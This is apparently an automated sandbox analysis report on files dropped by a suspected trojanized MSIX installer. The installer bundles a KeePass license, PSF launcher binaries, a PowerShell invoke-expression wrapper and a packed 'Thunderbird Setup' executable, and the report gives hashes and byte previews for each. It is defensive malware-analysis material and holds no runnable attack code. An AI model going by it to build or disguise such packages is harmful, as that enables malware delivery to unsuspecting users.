Preview:	<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<BlockMap xmlns="http://schemas.microsoft.com/appx/2010/blockmap" xmlns:b4="http://schemas.microsoft.com/appx/2021/blockmap" IgnorableNamespaces="b4" HashMethod="http://www.w3.org/2001/04/xmlenc#sha256"><File Name="Registry.dat" Size="8192" LfhSize="42"><Block Hash="Vh8OaCZf94faYWeNiH04nHJddp+kzbdQ8Z5uqTNcjdM=" Size="1296"/></File><File Name="AI_STUBS\AiStubX64.exe" Size="587776" LfhSize="52"><Block Hash="ph7+Fpt75jkHVZOBPJqiKDcIRF6XT8wOl84e98rdBlI=" Size="34474"/><Block Hash="dXQsRchQjUsaCT27mwutDq3lT+2/lWxrFDPEp3xqVtU=" Size="29681"/><Block Hash="FXxIyFTDJxjhQlphvD9fVZztRNs8DgGSe98sbrcVl2o=" Size="26446"/><Block Hash="1XUnu+2O0UBHl28tVZrE3qEqpdAVZXQPlsHmqDCmtoU=" Size="38004"/><Block Hash="oSMnmbzWCbFWMGdLiqoUznEql+Szx7qxZR8/twfjz64=" Size="35776"/><Block Hash="cjbTExmsP0huAvG8/q8lGJW0nngYFtYWyM4jMzrBL0w=" Size="36065"/><Block Hash="C/v2e9EpE9VetWZvs+AYa/+NDidGLePrw3nv50gpp34=" Size="30690"/><Block Hash="NzaRFjVCKqpP7RSAAJ1ijwh2

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxManifest.xml

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (627), with CRLF line terminators
Category:	dropped
Size (bytes):	3070
Entropy (8bit):	5.304774849384443
Encrypted:	false
SSDEEP:	48:3jRAVt7ANkAN+ANS0AjMA737Ngj2JzUv/zEJ90rJ1gDlU9B/Tgmh9ygmqJ9UJbSv:TRAVpANkAN+ANNAwAzm2pUXoD8gWHryY
MD5:	B7EB215AE6094E4F863F1601F5570300
SHA1:	186F3362D8D1C4D3ACEE6E2322ED35001FC66C85
SHA-256:	F22392D280BF02E368E2C93E9B63DCF96619F607EC512CD7AFFB38D506CF1D28
SHA-512:	F8ACC7115CB32DBE18A14715D159950A351B1F999F3DBBC51A22F970B7CCA42B2D124DFD530E8878EAD019EB6B615C96A728ABC334693C8FCCF5D8C3539DEE80
Malicious:	false
Reputation:	low
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:build="http://schemas.microsoft.com/developer/appx/2015/build" xmlns:uap5="http://schemas.microsoft.com/appx/manifest/uap/windows10/5" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" xmlns:uap8="http://schemas.microsoft.com/appx/manifest/uap/windows10/8" xmlns:rescap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities" xmlns:rescap3="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities/3" IgnorableNamespaces="uap uap8 rescap rescap3 build uap5">.. <Identity Name="manager" ProcessorArchitecture="x64" Publisher="CN=LLC HORN, O=LLC HORN, STREET="Khodynskaya street, 2 pom 22N", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1237700338150, OID.2.5.4.15=Private Organization" Version="5.2.14.0" />.. <Pr

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxMetadata\CodeIntegrity.cat

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	data
Category:	dropped
Size (bytes):	6246
Entropy (8bit):	7.475879247364467
Encrypted:	false
SSDEEP:	96:hJgtWpMki2oc+ClZR7mkSZY8nic4MCr9VkLtJu3U36iiXI9oGmDl5YatIBQ:h4My2j6kSDnicMOtJD6iiXKoTD4GkQ
MD5:	FAB8260B8C21ABC7144539EF25A5E49D
SHA1:	0958881008E56E8A02C71B1BE6BA109113F48486
SHA-256:	FD019825B28B175E0EC8344EE3C62B7A9E3880D78834A53646E2381E5A291A7A
SHA-512:	BE0F75AF913C10E20B22F611F3E3AAC02ECC4B4F54495DF2913595FDB73816564248E15BFEFF39C00C031C07A70196D3B4048B657B8BAB94F761FD266667C817
Malicious:	false
Reputation:	low
Preview:	0..b...H.........S0..O...1.0...`.H.e......0.....+.....7......0...0...+.....7......:.&...D...{.N...231130134057Z0...+.....7.....0.. 0....d...1.dT..A..0...1.0...+.....7...1...0...fG..I5...A...2....1.0...+.....7...1...0.....`hrP..8J!...^0...1.0...+.....7...1...0.......$....u.x.Ix.1.0...+.....7...1...0... )...Bz.=.K.I........)......3-1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... )...Bz.=.K.I........)......3-0..9.W..a...b..H.%7.b.\1.0...+.....7...1...0*..;+.G..c%.p{..a.._.1.0...+.....7...1...0... J..?.....$..Y....Vz.p.c..d..E.O1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... J..?.....$..Y....Vz.p.c..d..E.O0... my...@....5.i........zeO..1n.U.1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... my...@....5.i........zeO..1n.U.0... w.B..Izf9.s.E.#?hG........h.1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... w.B..Izf9.s.E.#?hG......

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxSignature.p7x

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	data
Category:	dropped
Size (bytes):	4821
Entropy (8bit):	7.622177843321434
Encrypted:	false
SSDEEP:	96:l+yR7mkSZY8nic4MCr9VkLtJu3U36iiXI9oGmDl5YatIhkZWuP4txGA:/6kSDnicMOtJD6iiXKoTD4GakIGA
MD5:	7A57B345B3BA9863F118AE85F7C6BC5F
SHA1:	D61ADD2C4F07722E99BB58B14B9DBD2D2A73ACA7
SHA-256:	CAB004C32E892D267E536C3825932B67B9538CE86049FC1CF3B3F5872FA3BAEF
SHA-512:	544651231B3F69D0021420CE4B9943092277E5A01A5DDF1AE9032CE32F9B28E9EEFA087021F6CF6A667E284825E54F4BEEDEBCB455492FCFAB0233394FA8594A
Malicious:	false
Preview:	PKCX0......H..........0......1.0...`.H.e......0.....+.....7.......0...05..+.....7...0'........K......M.n#.9..................0..0...`.H.e.........APPXAXPC.I..U.Jai..1(^J.F......[..O..(\.AXCD.......d...8V.t\....._..61m.486AXCTa..jE+.. .Pq{D..B.%uDc...\...N.LAXBM..\|...b..HK.."BZ...G.K...^...@..AXCI...%...^..4N..+z.8..4.6F.8.Z).z...m0...0.........w....Y...GaS.?u.0....H........0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450...200728000000Z..300728000000Z0\1.0...U....BE1.0...U....GlobalSign nv-sa1200..U...)GlobalSign GCC R45 EV CodeSigning CA 20200.."0....H.............0......... ....2C.[..#. ^.8...,..A..U..S.....z9\..................L..JDP.x..j......\|./..W3.X{..m...&..Or..{d...U_....,...%.}Q+..I._...5...../.J../p....3..@.........S.R.xLQ........t.............q....A3 u........&w.m..I.........{.^..$.co~..a.U.$..6.........&...V...........4..&...xm..<....a..p6.y...s...,...X.96H.;Z.".t..,.......Im..kc ].~;.C.b:.....7.$

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\ManagerSquare150x150Logo.scale-100.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 210 x 210, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7032
Entropy (8bit):	7.893717745075262
Encrypted:	false
SSDEEP:	192:8MgjjVTFKYJvKQ553ZOHO9WYmaTZtuRKefs1UjTwtivt8XzjN:8MgjphL53ZOu9WYmrnfuUjTiSWjN
MD5:	D0A1089AF0EB90386BA143C6534ACDCD
SHA1:	A6616AD4F312527FBF037C412CCCF6363F8A53C6
SHA-256:	AB8ABF4942E1AAF3DCAD1A4991EBDACB9F2B64DCC729DF638E6D1645ED3614C2
SHA-512:	35776A7A33391ED3E06C866AB8834D9B3C07EE6841F3C12092906ABACD21F7771C01A3606184CF0A4E036E254D9E48B2C5621F89C58A635E4E7CA14AFCBA8966
Malicious:	false
Preview:	.PNG........IHDR.............?..B....sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..t].y......IYLHN.4.i..0!.Bs.i...f.@.I../x......e..o,^..$,^I.......[...d.eY...?.^...JzO.s.}.9.c!$.{..o.[..de..+.TX.5.O$.%.IEuY.s..RK..2b.D"Q..\N.Ps.C..c\|.H$JV....n.I$JE..H...$.(..H"Q...D..$ .D.H@.....$.. ..`.c...=.......(..z,...{.?'2C....@...^.E.....\NGO.FY...c\.Df.Z......L...a....g...u.'ZS..@U...o...r.yo6.:...pG;b.6:nJ~.:.8...V..L...1..~......3.]..C."k@.H>.Gj.....9.j{...?;.......n]..Z:.!.....Z..4p"..{....<H.q.....]J+.......ql....y..M.....).. .E.{.w..k.<@..j..,........C..3D.UdA.@.......J....;..a....6.........v.....}...p...^E.$./#...vi..SJ.>o...}w@.t.t..Q...A...`.....J?YXI.Nf....g.}.(XE.$.....k8.Z....J..m.C......+.x.....q.z...c....8...3..n..!.F...@.xW.-.e[....`.7..arb..Gj..Tb!..y.....V.qQ%..P.g\|.$%... ..6t.6..y..r..~..$B....p.\.n....0....P?...(.\|R..^....}.a<..`..}.D.I.p.....9p.t.........4.k.Q.-.....n.2.$...`...W.+....i_.I.T.3..3..u..B...-..w..+..y....n...

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\ManagerSquare44x44Logo.scale-100.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 210 x 210, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7032
Entropy (8bit):	7.893717745075262
Encrypted:	false
SSDEEP:	192:8MgjjVTFKYJvKQ553ZOHO9WYmaTZtuRKefs1UjTwtivt8XzjN:8MgjphL53ZOu9WYmrnfuUjTiSWjN
MD5:	D0A1089AF0EB90386BA143C6534ACDCD
SHA1:	A6616AD4F312527FBF037C412CCCF6363F8A53C6
SHA-256:	AB8ABF4942E1AAF3DCAD1A4991EBDACB9F2B64DCC729DF638E6D1645ED3614C2
SHA-512:	35776A7A33391ED3E06C866AB8834D9B3C07EE6841F3C12092906ABACD21F7771C01A3606184CF0A4E036E254D9E48B2C5621F89C58A635E4E7CA14AFCBA8966
Malicious:	false
Preview:	.PNG........IHDR.............?..B....sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..t].y......IYLHN.4.i..0!.Bs.i...f.@.I../x......e..o,^..$,^I.......[...d.eY...?.^...JzO.s.}.9.c!$.{..o.[..de..+.TX.5.O$.%.IEuY.s..RK..2b.D"Q..\N.Ps.C..c\|.H$JV....n.I$JE..H...$.(..H"Q...D..$ .D.H@.....$.. ..`.c...=.......(..z,...{.?'2C....@...^.E.....\NGO.FY...c\.Df.Z......L...a....g...u.'ZS..@U...o...r.yo6.:...pG;b.6:nJ~.:.8...V..L...1..~......3.]..C."k@.H>.Gj.....9.j{...?;.......n]..Z:.!.....Z..4p"..{....<H.q.....]J+.......ql....y..M.....).. .E.{.w..k.<@..j..,........C..3D.UdA.@.......J....;..a....6.........v.....}...p...^E.$./#...vi..SJ.>o...}w@.t.t..Q...A...`.....J?YXI.Nf....g.}.(XE.$.....k8.Z....J..m.C......+.x.....q.z...c....8...3..n..!.F...@.xW.-.e[....`.7..arb..Gj..Tb!..y.....V.qQ%..P.g\|.$%... ..6t.6..y..r..~..$B....p.\.n....0....P?...(.\|R..^....}.a<..`..}.D.I.p.....9p.t.........4.k.Q.-.....n.2.$...`...W.+....i_.I.T.3..3..u..B...-..w..+..y....n...

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\Store50x50Logo.scale-100.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 210 x 210, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7032
Entropy (8bit):	7.893717745075262
Encrypted:	false
SSDEEP:	192:8MgjjVTFKYJvKQ553ZOHO9WYmaTZtuRKefs1UjTwtivt8XzjN:8MgjphL53ZOu9WYmrnfuUjTiSWjN
MD5:	D0A1089AF0EB90386BA143C6534ACDCD
SHA1:	A6616AD4F312527FBF037C412CCCF6363F8A53C6
SHA-256:	AB8ABF4942E1AAF3DCAD1A4991EBDACB9F2B64DCC729DF638E6D1645ED3614C2
SHA-512:	35776A7A33391ED3E06C866AB8834D9B3C07EE6841F3C12092906ABACD21F7771C01A3606184CF0A4E036E254D9E48B2C5621F89C58A635E4E7CA14AFCBA8966
Malicious:	false
Preview:	.PNG........IHDR.............?..B....sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..t].y......IYLHN.4.i..0!.Bs.i...f.@.I../x......e..o,^..$,^I.......[...d.eY...?.^...JzO.s.}.9.c!$.{..o.[..de..+.TX.5.O$.%.IEuY.s..RK..2b.D"Q..\N.Ps.C..c\|.H$JV....n.I$JE..H...$.(..H"Q...D..$ .D.H@.....$.. ..`.c...=.......(..z,...{.?'2C....@...^.E.....\NGO.FY...c\.Df.Z......L...a....g...u.'ZS..@U...o...r.yo6.:...pG;b.6:nJ~.:.8...V..L...1..~......3.]..C."k@.H>.Gj.....9.j{...?;.......n]..Z:.!.....Z..4p"..{....<H.q.....]J+.......ql....y..M.....).. .E.{.w..k.<@..j..,........C..3D.UdA.@.......J....;..a....6.........v.....}...p...^E.$./#...vi..SJ.>o...}w@.t.t..Q...A...`.....J?YXI.Nf....g.}.(XE.$.....k8.Z....J..m.C......+.x.....q.z...c....8...3..n..!.F...@.xW.-.e[....`.7..arb..Gj..Tb!..y.....V.qQ%..P.g\|.$%... ..6t.6..y..r..~..$B....p.\.n....0....P?...(.\|R..^....}.a<..`..}.D.I.p.....9p.t.........4.k.Q.-.....n.2.$...`...W.+....i_.I.T.3..3..u..B...-..w..+..y....n...

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Assets\msix_default.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 210 x 210, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7032
Entropy (8bit):	7.893717745075262
Encrypted:	false
SSDEEP:	192:8MgjjVTFKYJvKQ553ZOHO9WYmaTZtuRKefs1UjTwtivt8XzjN:8MgjphL53ZOu9WYmrnfuUjTiSWjN
MD5:	D0A1089AF0EB90386BA143C6534ACDCD
SHA1:	A6616AD4F312527FBF037C412CCCF6363F8A53C6
SHA-256:	AB8ABF4942E1AAF3DCAD1A4991EBDACB9F2B64DCC729DF638E6D1645ED3614C2
SHA-512:	35776A7A33391ED3E06C866AB8834D9B3C07EE6841F3C12092906ABACD21F7771C01A3606184CF0A4E036E254D9E48B2C5621F89C58A635E4E7CA14AFCBA8966
Malicious:	false
Preview:	.PNG........IHDR.............?..B....sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..t].y......IYLHN.4.i..0!.Bs.i...f.@.I../x......e..o,^..$,^I.......[...d.eY...?.^...JzO.s.}.9.c!$.{..o.[..de..+.TX.5.O$.%.IEuY.s..RK..2b.D"Q..\N.Ps.C..c\|.H$JV....n.I$JE..H...$.(..H"Q...D..$ .D.H@.....$.. ..`.c...=.......(..z,...{.?'2C....@...^.E.....\NGO.FY...c\.Df.Z......L...a....g...u.'ZS..@U...o...r.yo6.:...pG;b.6:nJ~.:.8...V..L...1..~......3.]..C."k@.H>.Gj.....9.j{...?;.......n]..Z:.!.....Z..4p"..{....<H.q.....]J+.......ql....y..M.....).. .E.{.w..k.<@..j..,........C..3D.UdA.@.......J....;..a....6.........v.....}...p...^E.$./#...vi..SJ.>o...}w@.t.t..Q...A...`.....J?YXI.Nf....g.}.(XE.$.....k8.Z....J..m.C......+.x.....q.z...c....8...3..n..!.F...@.xW.-.e[....`.7..arb..Gj..Tb!..y.....V.qQ%..P.g\|.$%... ..6t.6..y..r..~..$B....p.\.n....0....P?...(.\|R..^....}.a<..`..}.D.I.p.....9p.t.........4.k.Q.-.....n.2.$...`...W.+....i_.I.T.3..3..u..B...-..w..+..y....n...

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\License.txt

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18710
Entropy (8bit):	4.721320556205689
Encrypted:	false
SSDEEP:	384:7UO4j2PmwE3b6k/iAVX/dUY2ZpEGMOZ77oPpDqHZ:7UO46uh1iYWrTXoPpDqHZ
MD5:	883FC3D7E7A4773F3FA777F740175C21
SHA1:	4FBAD48DE9B47C50BB141F6A2CE4267C6328F21E
SHA-256:	7F43637944C83B6522C96BC6CDFE09B54E65B6DD0BF1B5E7B60BBB9EB736382E
SHA-512:	E8411D7B00CB0F2A4694645ECB44FB4699219455BEEC67DEED6418372C1D3A7D81EDF1CEEEB0A0B32D6A7CDE68E1C2A8775E14C79BC7CC00608FE89A59A6A7F0
Malicious:	false
Preview:	KeePass: Copyright (C) 2003-2023 Dominik Reichl <dominik.reichl@t-online.de>.....The software is distributed under the terms of the GNU General Public License..version 2 or later.....For acknowledgements and licenses of components/resources/etc., see the file..'KeePass.chm'..... GNU GENERAL PUBLIC LICENSE.. Version 2, June 1991.... Copyright (C) 1989, 1991 Free Software Foundation, Inc.,.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.. Everyone is permitted to copy and distribute verbatim copies.. of this license document, but changing it is not allowed..... Preamble.... The licenses for most software are designed to take away your..freedom to share and change it. By contrast, the GNU General Public..License is intended to guarantee your freedom to share and change free..software--to make sure the software is free for all its users. This..General Public License applies to most of the Free Software..Fou

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll32.exe

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	84896
Entropy (8bit):	6.461613531158859
Encrypted:	false
SSDEEP:	1536:S2+TsC0JFD2d4/lcRbgjCQgC8rq9baCCqGwD3YZSsW3cdPw2llYB06Px9:S9sCmFKAlcigC8rq9baCCUY/Pw2llYB5
MD5:	2A4CC849D8825286740FB169AA9A492F
SHA1:	77993295AE991A338AF77194E0494442AB10CB33
SHA-256:	137B9CD85772A3357397B4C13EDBC80E029DA48F1A615AD43B053AEAA575113C
SHA-512:	D7F1486C823EFB7F57975F29683E3C98051BADD3DB084F52BF7795DBA908ED5D1A1CBE4FCD9361EF5C51365FDFC3E0A4DB3BC2AEC359D3FD548C266D8E4666CC
Malicious:	false
Joe Sandbox View:	Filename: Twitch_Ventures-x64.zip, Detection: malicious, Browse Filename: PDF Extra-x86.zip, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................@......@.j....@......Rich...........................PE..L.....c..............."..........................@..........................`......_~....@.....................................(....@...............(...#...P..........p...............................@............................................text............................... ..`.rdata...Z.......\..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll64.exe

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	103840
Entropy (8bit):	6.141041369340242
Encrypted:	false
SSDEEP:	3072:qLlNIoSLtpUJqpiy8UpXSnMlBiSTd+Zxl:yIhJyJqp1d1TdM
MD5:	8D0B98933350014B8790E3F0CAC9FE68
SHA1:	77DF2AAAB53EDD7C2E813A03AD7FC6684157D7EB
SHA-256:	372B1B5E1A2C537CF51F279E867262DDAE781ABA591838439786D952D200C45E
SHA-512:	F61EA7D3DD7711EC3F409CD0604AECAA55AD229B80155546D0BBF5AC18A4482B8CE3193FA80B17EC1B09BD7EEA8B450AF27C19253024A0A212F46BFAEE3B766F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........~...~...~.......~.......~......3~.......~.......~.......~.......~...~...~..x....~..x.u..~..x....~..Rich.~..........................PE..d.....c.........."....".......................@..........................................`.................................................@W..(...............\....r...#......@...@G..p............................F..@............................................text.............................. ..`.rdata..`...........................@..@.data........`.......N..............@....pdata..\............X..............@..@_RDATA..\............f..............@..@.rsrc................h..............@..@.reloc..@............j..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime32.dll

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	359840
Entropy (8bit):	6.630369771494236
Encrypted:	false
SSDEEP:	6144:S8QhYTB60hQIi29+gcopYQF0OvqGXeKuZOTVpW41Xts+kNAOTWzXekxV:JQh0+rpupYQF0OvReKuZgZGhWykxV
MD5:	B42D990B21ACDD60CB8515D6211523FC
SHA1:	3527DB4D06B860172F6D0470C49785914C494A21
SHA-256:	8F6EF611BFFA63964F2A736AF6026B9CFD380B92B07B7EC1BF2BC461B342053A
SHA-512:	6580EF8542C41B42FCF1EEEAE8F55C26D3A29D6B149A90DD52DF255F060089A4A24AC7B59536F66DE4AB9D6185ED2AB16F7B8CC9B70CBC304A52C4D552C3504E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.G.............x.......x......x.......o.......o.......o.......x..............Ho......Ho......Ho.....Ho......Rich....................PE..L.....c...........!..."............................................................".....@.........................P.......P...<....................Z...#.......4..(...p...........................h...@............................................text...}........................... ..`.rdata..T0.......2..................@..@.data....%..........................@...psf..........@......................@..@.detourc.....P......................@..@.detourd.....p....... ..............@....rsrc................"..............@..@.reloc...4.......6...$..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime64.dll

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	448928
Entropy (8bit):	6.360227531464207
Encrypted:	false
SSDEEP:	6144:YTGFOOzDJyq/5FRkjsV97F3NhYJacCgbQlgJtoh7WeYsZtRoNE9er:Y90DJyWKjsfLnc/bpfokeYGR9er
MD5:	C01048C4335FBDF4CB9E4C2C04FDCC2C
SHA1:	5520F16A567762FE4B796FD32F0036B4BD43AC09
SHA-256:	19432E359B0A338D905EE965D915FBB7453F8B9EEB74C52D461BAC11CD64F737
SHA-512:	3869C7BDBA3300F52C7578882B67BDA7010E7B5EC0C977683A9333255893042660CF06841E4BADF506AB9E8AD5C841584C62E77991FA0AAF33A972DD3ACC515B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N../../../..D../..D../..D.../...S../...S../...S.../..D../../..-/..tS../..tS../..tSJ./..tS../..Rich./..................PE..d...*.c.........." ...".p...Z......TB.......................................0.......Q....`.....................................................<............p..4>.......#... ......0...p.......................(......@............................................text....o.......p.................. ..`.rdata..<............t..............@..@.data...T5...0......................@....pdata..4>...p...@...<..............@..@_RDATA..\............\|..............@..@........ ............~..............@..@.detourc.!......."..................@..@.detourd............................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Registry.dat

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.1660667083980325
Encrypted:	false
SSDEEP:	96:leCYQRKjYB93sdTU1c1Bzr1bVzSeUxBEHWc1SVzSeUAB:gCYXjz1BzlkeU0HWhkeU
MD5:	830152AC53D9E306AA1391187C2DEA68
SHA1:	6152676FFA37A566738239DCC4CB4FC1971AAA73
SHA-256:	561F0E68265FF787DA61678D887D389C725D769FA4CDB750F19E6EA9335C8DD3
SHA-512:	3F30A4811828F572856D4E330F05F9DED94EE931B711BBA553F4198B49138E99795E24D962C07D826570EB0962F79C4FF51C063DD9D1D861CB902CAB4F678627
Malicious:	false
Preview:	regf................................ ...........................................................................................................................................OfRg..........................................................................................................................................................................................................................................................................................................................................5.....#..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\ShInstUtil.exe

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	97176
Entropy (8bit):	6.701105397130089
Encrypted:	false
SSDEEP:	1536:OuFhQvtxgxuLscBOHeWw0dUlSWme75HMgAcg2L7SWrdg2L7Sb:FFgxyuLMI0ukWme75HMFcZfSWRZfSb
MD5:	173D36CFB847CCEE904F08A3CBB0054D
SHA1:	A99D5DCDD5E538FB3EB9FF7270F9FDD83B46F731
SHA-256:	4B5ACEA7BC850CB2BA1D781CFF7A5C5E515525E9E798837695C94E6DB70FD3AA
SHA-512:	CF9C68F895D0EA2352E336E7825F3F6B53C2353888C67AA78021D850FAA0D1B4372F4E6E0B45644D0652419D6A6D65910F02E42A7C0197F0684CD2103DD41502
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-..6i..ei..ei..e`..e{..e`..e9..e`..e@..eN{.ed..ei..e5..e`..eh..ew..eh..e`..eh..eRichi..e........PE..L.....zd.....................`......$S............@..........................p......C)....@.................................L........@...............*...Q...P......................................X...@...............H............................text...S........................... ..`.rdata...3.......4..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\StartingScriptWrapper.ps1

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13462
Entropy (8bit):	5.979733631055991
Encrypted:	false
SSDEEP:	384:wNBk9t6/z+DS8pED8m3IwHkCaB8q8Fqm/krh+hEJ5jj:QBr+G8pEDz3IwfamFqm8rh+hej
MD5:	E06D0AB3E6CB84E09450EBA6815ADEBD
SHA1:	9B4687B51DE5AD46C4957A6321745004DC4A39DD
SHA-256:	C67B8CC2AF757B3AC17908BB6A4401F647D85C1FE52BCDECAFF4F613D3837270
SHA-512:	52C055135BB8C3859FBE53887D3B4882549292C0115DAD28990763F29A45857892F94993BEC32CBDB412ECFEAE7B6B8EDA0B2897847B8A72C8FF3D812351134A
Malicious:	false
Preview:	<#...PARAMETER ScriptPathAndArguments...The location of the script to run and the arguments.......PARAMETER $errorActionPreferenceForScript.. Sets the Error Action PRefrence for this script..#>....Param (.. [Parameter(Mandatory=$true)].. [string]$ScriptPathAndArguments..)....try..{...invoke-expression $scriptPathAndArguments..}..catch..{...write-host $_.Exception.Message...#ERROR 774 refers to ERROR_ERRORS_ENCOUNTERED....#This error will be brought up the the user....exit(774)..}....exit(0)..# SIG # Begin signature block..# MIIjigYJKoZIhvcNAQcCoIIjezCCI3cCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG..# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDM5jDJr2UyUBHj..# +IQlHDpaHJLa0gypx0r2f3h+ufKU+KCCDYUwggYDMIID66ADAgECAhMzAAABUptA..# n1BWmXWIAAAAAAFSMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD..# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy..# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Thunderbird%20Setup%20115.4.3.exe

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	60060176
Entropy (8bit):	7.9999125004846965
Encrypted:	true
SSDEEP:	1572864:FJBhBUZqnwvXfk1fGONO4m1yQvzcuYhxwFvDNRg:NNgud01JBa
MD5:	1BA15286574BFA6F728486589A71ADE6
SHA1:	459211CB43BC995DE34D5551C924DCD488CF9706
SHA-256:	CF01DA7F4488166091386BD21D79B14A4F6F7E04BE0EF098EDCFF4704DEFAE08
SHA-512:	0E7784863D383850C1A17B340FA01011EBB14CBABB20B7528A1947769E0828C7A707D3CA615560DE9BAD91107AA82AF09A19CCFD9A96F8454BE05D3700BD0C20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`Y.`Y.`YM.nY.`Y&.dY.`Y..?Y.`Y..=Y.`Y.aYb.`Y&.jY.`Y&.kY..`Yv.fY.`YRich.`Y........................PE..L...9m.[......................... ...0...0...@....@..........................0.......^.......................................!.......@..............`A...0..................................................................0.......................UPX0..... ..............................UPX1.........0......................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\VFS\AppData\iconv.dll

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	892928
Entropy (8bit):	7.316650828024265
Encrypted:	false
SSDEEP:	24576:hamf2FfWl8KuqGavkg3NyNIbbbIoIBAUZLY:hx+s8KuqGaX0ToIBAUZLY
MD5:	D7CBBEDFAD7AD68E12BF6FFCC01C3080
SHA1:	A21C860B81ED158E91B2B921B752F48FDA6D6F1E
